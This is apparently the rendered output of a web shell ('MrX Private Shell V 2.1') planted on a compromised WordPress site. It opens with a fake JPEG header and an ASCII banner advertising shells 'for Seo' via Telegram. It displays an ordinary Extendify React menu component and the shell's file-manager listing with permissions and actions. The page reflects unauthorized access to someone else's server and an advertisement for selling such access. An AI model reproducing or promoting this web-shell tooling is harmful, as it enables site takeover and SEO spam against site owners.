����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
import { MenuGroup, MenuItem } from '@wordpress/components';
import { __ } from '@wordpress/i18n';
import { pencil } from '@wordpress/icons';
export const DraftMenu = ({ disabled, setInputText, setReady }) => {
const handleClick = (inputText) => {
setInputText(inputText);
setReady(false);
};
const actionsList = [
{
label: __('A paragraph …', 'extendify-local'),
onClickText: __('Write a paragraph about', 'extendify-local'),
},
{
label: __('Blog post …', 'extendify-local'),
onClickText: __('Write a blog post about', 'extendify-local'),
},
{
label: __('An informative article …', 'extendify-local'),
onClickText: __('Write an informative article about', 'extendify-local'),
},
{
label: __('Headline …', 'extendify-local'),
onClickText: __('Write a headline for', 'extendify-local'),
},
{
label: __('List …', 'extendify-local'),
onClickText: __('Write a list of', 'extendify-local'),
},
];
return (
<MenuGroup>
{actionsList.map(({ label, onClickText }) => (
<MenuItem
key={label}
onClick={() => handleClick(`${onClickText} `)}
disabled={disabled}
icon={pencil}
iconPosition="left"
>
{label}
</MenuItem>
))}
</MenuGroup>
);
};
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| image-generation | Folder | 0755 |
|
|
| stock-images | Folder | 0755 |
|
|
| Completion.jsx | File | 616 B | 0644 |
|
| ConsentSidebar.jsx | File | 769 B | 0644 |
|
| DraftMenu.jsx | File | 1.22 KB | 0644 |
|
| DynamicTextarea.jsx | File | 2.15 KB | 0644 |
|
| EditMenu.jsx | File | 2.36 KB | 0644 |
|
| GenerateImageButtons.jsx | File | 5.47 KB | 0644 |
|
| Input.jsx | File | 2.52 KB | 0644 |
|
| InsertMenu.jsx | File | 7.46 KB | 0644 |
|
| SelectedText.jsx | File | 1.69 KB | 0644 |
|
| ToolbarMenu.jsx | File | 5.04 KB | 0644 |
|
| TranslationDropdown.jsx | File | 6.34 KB | 0644 |
|